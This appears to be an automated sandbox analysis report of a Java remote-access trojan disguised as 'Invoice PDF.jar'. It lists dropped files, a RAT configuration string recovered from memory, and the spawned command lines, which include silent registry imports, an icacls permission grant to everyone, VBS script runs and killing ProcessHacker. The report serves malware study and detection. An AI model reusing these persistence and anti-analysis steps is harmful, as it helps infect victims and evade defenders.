          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\unpack200.exe
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\dtplugin\deployJava1.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\ktab.exe
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\gstreamer-lite.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jsdt.dll
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\hprof.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\JAWTAccessBridge-32.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\dt_shmem.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\ssv.dll
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-console-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\j2pkcs11.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\javaws.exeJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-file-l1-2-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\javacpl.exeJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\javafx_iio.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\policytool.exe
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\t2k.dll
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\eula.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\java_crw_demo.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\bci.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\rmiregistry.exe
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jpeg.dll
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\wsdetect.dll
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\vcruntime140.dll
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\WindowsAccessBridge-32.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\fxplugins.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-multibyte-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\servertool.exe
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\decora_sse.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\ssvagent.exe
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\dt_socket.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\JavaAccessBridge-32.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-util-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jdwp.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\w2k_lsa_auth.dll
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jfxmedia.dll
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\plugin2\npjp2.dll
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jsoundds.dll
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\resource.dll
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\java-rmi.exeJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-file-l2-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jp2ssv.dll
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\dcpr.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\keytool.exe
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jli.dll
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\npt.dll
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\fontmanager.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jaas_nt.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\rmid.exe
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\tnameserv.exe
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\lcms.dll
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\prism_common.dll
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jp2iexp.dll
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\concrt140.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\prism_d3d.dll
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\mlib_image.dll
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jjs.exe
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\dtplugin\npdeployJava1.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jsound.dll
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jp2native.dll
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-file-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\klist.exe
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\unpack.dll
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\javacpl.cplJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\javafx_font.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\orbd.exe
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-string-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: java.exe, 0000000A.00000002.592979586.0000000009E5B000.00000004.00000001.sdmpBinary or memory string: VMWARE;|
          Source: java.exe, 0000000A.00000002.589242015.0000000004690000.00000004.00000001.sdmpBinary or memory string: {"NETWORK":[{"PORT":7777,"DNS":"127.0.0.1"}],"INSTALL":false,"MODULE_PATH":"zS/lq/BTk.GI","PLUGIN_FOLDER":"DdWDtpinxpf","JRE_FOLDER":"HSIROD","JAR_FOLDER":"fUTkALeaTxM","JAR_EXTENSION":"Vybgol","ENCRYPT_KEY":"cPFjgddXIBcXBCIseEuXTZjwi","DELAY_INSTALL":2,"NICKNAME":"User","VMWARE":false,"PLUGIN_EXTENSION":"DhjWU","WEBSITE_PROJECT":"https://jrat.io","JAR_NAME":"uiylKSALYJr","JAR_REGISTRY":"WLyQyhWoosi","DELAY_CONNECT":2,"VBOX":false}
          Source: java.exe, 00000002.00000002.336190557.00000000155D0000.00000002.00000001.sdmp, wscript.exe, 00000005.00000002.375981336.00000000061D0000.00000002.00000001.sdmp, javaw.exe, 00000009.00000002.599666578.0000000015B70000.00000002.00000001.sdmp, java.exe, 0000000A.00000002.595530638.0000000014E10000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: java.exe, 00000002.00000002.332031373.0000000002B40000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.588443966.0000000002520000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.588652984.00000000024B0000.00000004.00000001.sdmpBinary or memory string: ,java/lang/VirtualMachineError
          Source: java.exe, 00000002.00000002.332031373.0000000002B40000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.588443966.0000000002520000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.588652984.00000000024B0000.00000004.00000001.sdmpBinary or memory string: |[Ljava/lang/VirtualMachineError;
          Source: java.exe, 0000000A.00000002.590033578.0000000004813000.00000004.00000001.sdmpBinary or memory string: VMWARE
          Source: java.exe, 0000000A.00000002.590033578.0000000004813000.00000004.00000001.sdmpBinary or memory string: VMWARE+
          Source: java.exe, 00000002.00000002.336190557.00000000155D0000.00000002.00000001.sdmp, wscript.exe, 00000005.00000002.375981336.00000000061D0000.00000002.00000001.sdmp, javaw.exe, 00000009.00000002.599666578.0000000015B70000.00000002.00000001.sdmp, java.exe, 0000000A.00000002.595530638.0000000014E10000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: java.exe, 00000002.00000002.336190557.00000000155D0000.00000002.00000001.sdmp, wscript.exe, 00000005.00000002.375981336.00000000061D0000.00000002.00000001.sdmp, javaw.exe, 00000009.00000002.599666578.0000000015B70000.00000002.00000001.sdmp, java.exe, 0000000A.00000002.595530638.0000000014E10000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: javaw.exe, 00000009.00000003.427734710.0000000015002000.00000004.00000001.sdmpBinary or memory string: C:\Program Files (x86)\VMware\VMware Tools
          Source: java.exe, 00000002.00000002.336190557.00000000155D0000.00000002.00000001.sdmp, wscript.exe, 00000005.00000002.375981336.00000000061D0000.00000002.00000001.sdmp, javaw.exe, 00000009.00000002.599666578.0000000015B70000.00000002.00000001.sdmp, java.exe, 0000000A.00000002.595530638.0000000014E10000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeMemory protected: page read and write | page guard
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -javaagent:'C:\Users\user\AppData\Local\Temp\jartracer.jar' -jar 'C:\Users\user\Desktop\Invoice PDF.jar'
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeProcess created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant 'everyone':(OI)(CI)M
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeProcess created: C:\Windows\SysWOW64\wscript.exe wscript C:\Users\user\bgddtomvyl.js
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\regedit.exe 'regedit.exe' 'C:\Users\user\AppData\Local\Temp\ebgeaegdbdecaedfebace.reg'
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe' -jar 'C:\Users\user\AppData\Roaming\jhxromh.txt'
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -jar C:\Users\user\AppData\Local\Temp\_0.5473048333189129536838706564981496.class
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4117647702204724132.vbs
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive7530640457785674935.vbs
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: C:\Windows\SysWOW64\xcopy.exe xcopy 'C:\Program Files (x86)\Java\jre1.8.0_211' 'C:\Users\user\AppData\Roaming\Oracle\' /e
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM ProcessHacker.exe /T /F
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c regedit.exe /s C:\Users\user\AppData\Local\Temp\GYcBDbnJPA3276512531836276281.reg
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive7965693575833183651.vbs
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: unknown unknown
